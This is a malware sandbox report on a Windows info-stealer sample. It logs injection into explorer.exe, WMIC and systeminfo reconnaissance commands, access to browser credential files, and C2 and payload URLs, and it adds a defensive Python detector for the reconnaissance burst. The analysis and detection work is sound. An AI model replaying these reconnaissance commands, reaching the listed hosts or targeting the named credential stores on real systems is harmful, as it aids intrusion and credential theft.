Source: C:\Users\user\AppData\Local\Temp\E647.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\uejbbri | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\uejbbri | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A279C0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A279C0
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: A279C0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_03091016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_030910A5 wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2124953816.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2123923461.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2123559301.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032C55EB cpuid
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB879224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03272198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: B575.exe, 00000008.00000003.3228352555.000002EC777F5000.00000004.00000020.00020000.00000000.sdmp, B575.exe, 00000008.00000002.4536563179.000002EC777F9000.00000004.00000020.00020000.00000000.sdmp, B575.exe, 00000008.00000003.2966897326.000002EC777E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct
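
The process-creation rows in the previous section (B575.exe spawning cmd.exe, which then runs the three root\SecurityCenter2 WMIC queries, `netsh firewall show state`, `ipconfig /displaydns`, `route print`, `systeminfo` and `tasklist /v /fo csv` within seconds) and the SecurityCenter2 WMI queries listed here are the observable a detection engineer keys on. Two caveats the labels gloss over: the only netsh command the report records is `netsh firewall show state`, which reads firewall state and changes nothing, so the "Modifies the windows firewall" verdict rests on the invocation rather than on an observed change; and each command on its own is routine administration, so the tell is the burst of distinct recon tools from one cmd.exe parent, together with the Security Center enumeration. The following is an added example, not part of the Joe Sandbox report, run over constructed Sysmon-style process-creation events that mirror the command lines above (timestamps and PIDs are invented):

```python
"""Detection logic for the host-reconnaissance burst this report records under
B575.exe -> cmd.exe: WMIC queries against root\SecurityCenter2, netsh firewall
show state, ipconfig /displaydns, route print, systeminfo and tasklist, all
spawned by one cmd.exe within seconds. Added example; the events below are
constructed to mirror the report's command lines (timestamps and PIDs are
invented) and are not the sandbox's own telemetry."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, pid, parent pid, image path, command line), Sysmon Event ID 1 style.
RECON_EVENTS = [
    ("2024-09-25T10:00:01", 4000, 3900, r"C:\Windows\System32\cmd.exe", "cmd"),
    ("2024-09-25T10:00:02", 4001, 4000, r"C:\Windows\System32\wbem\WMIC.exe",
     r"wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv"),
    ("2024-09-25T10:00:02", 4002, 4000, r"C:\Windows\System32\wbem\WMIC.exe",
     r"wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv"),
    ("2024-09-25T10:00:03", 4003, 4000, r"C:\Windows\System32\wbem\WMIC.exe",
     r"wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv"),
    ("2024-09-25T10:00:03", 4004, 4000, r"C:\Windows\System32\wbem\WMIC.exe",
     r"wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv"),
    ("2024-09-25T10:00:04", 4005, 4000, r"C:\Windows\System32\ipconfig.exe", "ipconfig /displaydns"),
    ("2024-09-25T10:00:04", 4006, 4000, r"C:\Windows\System32\ROUTE.EXE", "route print"),
    ("2024-09-25T10:00:05", 4007, 4000, r"C:\Windows\System32\netsh.exe", "netsh firewall show state"),
    ("2024-09-25T10:00:05", 4008, 4000, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    ("2024-09-25T10:00:06", 4009, 4000, r"C:\Windows\System32\tasklist.exe", "tasklist /v /fo csv"),
]
# An administrator's two ad-hoc commands: no SecurityCenter2 query, no burst.
BENIGN_EVENTS = [
    ("2024-09-25T11:00:00", 5001, 4999, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("2024-09-25T11:20:00", 5002, 4999, r"C:\Windows\System32\wbem\WMIC.exe", "wmic os get caption"),
]

RECON_IMAGES = {"wmic.exe", "ipconfig.exe", "route.exe", "netsh.exe", "systeminfo.exe", "tasklist.exe"}
# WMIC asking the Security Center for installed AV / firewall / antispyware products.
SECURITYCENTER_RE = re.compile(
    r"root\\SecurityCenter2\b.*\b(AntiVirusProduct|FirewallProduct|AntiSpywareProduct)\b", re.I)
# netsh firewall/advfirewall 'show' is a read-only query of firewall state.
NETSH_FW_RE = re.compile(r"^\s*netsh(\.exe)?\s+(adv)?firewall\s+show\b", re.I)

def parse_events(rows):
    return [{"ts": datetime.fromisoformat(ts), "pid": pid, "ppid": ppid,
             "name": image.rsplit("\\", 1)[-1].lower(), "cmdline": cmdline}
            for ts, pid, ppid, image, cmdline in rows]

def detect(rows, burst_threshold=4, window=timedelta(seconds=60)):
    """Return (rule, pid or parent pid, detail) findings for the given events."""
    events = parse_events(rows)
    findings = []
    for e in events:
        if e["name"] == "wmic.exe" and SECURITYCENTER_RE.search(e["cmdline"]):
            findings.append(("security_product_enum", e["pid"], e["cmdline"]))
        if e["name"] == "netsh.exe" and NETSH_FW_RE.search(e["cmdline"]):
            findings.append(("firewall_state_query", e["pid"], e["cmdline"]))
    # Burst rule: one parent spawning >= burst_threshold distinct recon tools
    # inside a sliding time window.
    by_parent = defaultdict(list)
    for e in events:
        if e["name"] in RECON_IMAGES:
            by_parent[e["ppid"]].append(e)
    for ppid, children in by_parent.items():
        children.sort(key=lambda c: c["ts"])
        start = 0
        for end in range(len(children)):
            while children[end]["ts"] - children[start]["ts"] > window:
                start += 1
            distinct = {c["name"] for c in children[start:end + 1]}
            if len(distinct) >= burst_threshold:
                findings.append(("recon_burst", ppid, sorted(distinct)))
                break
    return findings

if __name__ == "__main__":
    for f in detect(RECON_EVENTS):
        print(*f)
```

The Security Center rule and the netsh rule are exact matches on this sample's command lines and cheap to run everywhere; the burst rule is the one that survives a renamed tool or a reordered sequence, and its threshold and window are the knobs to tune against an environment's own admin scripts.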

Stealing of Sensitive Information

Source: Yara match | File source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
Source: Yara match | File source: 6.2.E647.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.E647.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.uejbbri.24b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.E647.exe.2610000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.uejbbri.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.uejbbri.24a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl (the registry root under which WinSCP stores its saved sessions)
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the Outlook profile key that holds account settings, including stored mail credentials)

Remote Access Functionality

Source: Yara match | File source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
Source: Yara match | File source: 6.2.E647.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.E647.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.3.uejbbri.24b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.E647.exe.2610000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.uejbbri.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.uejbbri.24a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (digits in front of a technique are the page's signature-count badges; cells without digits are the matrix's unmatched placeholders):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 241 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 522 Process Injection | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | 1 Credentials in Registry | 249 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Software Packing | NTDS | 871 Security Software Discovery | Distributed Component Object Model | 11 Input Capture | 115 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 34 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 4 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 34 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 522 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1518333 | Sample: KTh1gQlT9a.exe | Startdate: 25/09/2024 | Architecture: WINDOWS | Score: 100
(The rendered graph, recovered as text. Numbers in parentheses after a process name are the graph's created-registry-value / created-file counters as rendered.)

Root: DNS/IP: nwgrus.ru; calvinandhalls.com. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures. Started: KTh1gQlT9a.exe; esjbbri; uejbbri; msiexec.exe.
KTh1gQlT9a.exe: Detected unpacking (changes PE section rights); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); 3 other signatures. Injected into: explorer.exe (94, 9). Started: cmd.exe (1).
esjbbri: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function).
uejbbri: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration).
explorer.exe (injected): DNS/IP: 190.98.23.157, ports 49756, 49758, 49760 (TelecommunicationcompanySuriname-TeleSurSR, Suriname); calvinandhalls.com 23.145.40.162, ports 443, 49741, 49742 (SURFAIRWIRELESS-IN-01US, Reserved); 2 other IPs or domains. Dropped: C:\Users\user\AppData\Roaming\uejbbri (PE32); C:\Users\user\AppData\Roaming\esjbbri (PE32); C:\Users\user\AppData\Local\Temp\E647.exe (PE32); 2 other malicious files. Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); 3 other signatures. Started: E647.exe; explorer.exe (20); B575.exe (2); 5 other processes.
cmd.exe: Uses netsh to modify the Windows network and firewall settings; Uses ipconfig to lookup or modify the Windows network settings; Modifies the windows firewall. Started: WMIC.exe; systeminfo.exe; conhost.exe; 17 other processes.
E647.exe: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 5 other signatures.
explorer.exe (second instance, started by the injected explorer.exe): System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access).
B575.exe: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes).
5 other processes: Tries to harvest and steal browser information (history, passwords, etc).

Source | Detection | Scanner | Label
KTh1gQlT9a.exe | 34% | ReversingLabs |
KTh1gQlT9a.exe | 100% | Avira | HEUR/AGEN.1310247
KTh1gQlT9a.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\esjbbri | 100% | Avira | HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\uejbbri | 100% | Avira | HEUR/AGEN.1310247
C:\Users\user\AppData\Local\Temp\E647.exe | 100% | Avira | HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\esjbbri | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\uejbbri | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\B575.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\E647.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\esjbbri | 34% | ReversingLabs |

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://excel.office.com | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://api.msn.com/ | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe |
https://powerpoint.office.comcember | 0% | Avira URL Cloud | safe |
https://23.145.40.164/ksa9104.exe | 0% | Avira URL Cloud | safe |
https://calvinandhalls.com/ | 0% | Avira URL Cloud | safe |
https://calvinandhalls.com/search.phpMozilla/5.0 | 0% | Avira URL Cloud | safe |
https://word.office.comon | 0% | Avira URL Cloud | safe |
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
https://calvinandhalls.com/earch.phpX | 0% | Avira URL Cloud | safe |
http://unicea.ws/tmp/index.php | 0% | Avira URL Cloud | safe |
http://nwgrus.ru/tmp/index.php | 100% | Avira URL Cloud | malware |
https://calvinandhalls.com/search.php | 0% | Avira URL Cloud | safe |
https://calvinandhalls.com:443/search.phpge | 0% | Avira URL Cloud | safe |
http://tech-servers.in.net/tmp/index.php | 0% | Avira URL Cloud | safe |
https://outlook.com | 0% | Avira URL Cloud | safe |
https://calvinandhalls.com/search.phpx | 0% | Avira URL Cloud | safe |
https://calvinandhalls.com/search.phpI | 0% | Avira URL Cloud | safe |
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | Avira URL Cloud | safe |
https://wns.windows.com/)s | 0% | Avira URL Cloud | safe |
http://crl.v | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
calvinandhalls.com | 23.145.40.162 | true | true | | unknown
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
nwgrus.ru | 116.58.10.60 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://23.145.40.164/ksa9104.exe | true | Avira URL Cloud: safe | unknown
http://unicea.ws/tmp/index.php | true | Avira URL Cloud: safe | unknown
http://nwgrus.ru/tmp/index.php | true | Avira URL Cloud: malware | unknown
https://calvinandhalls.com/search.php | true | Avira URL Cloud: safe | unknown
http://tech-servers.in.net/tmp/index.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
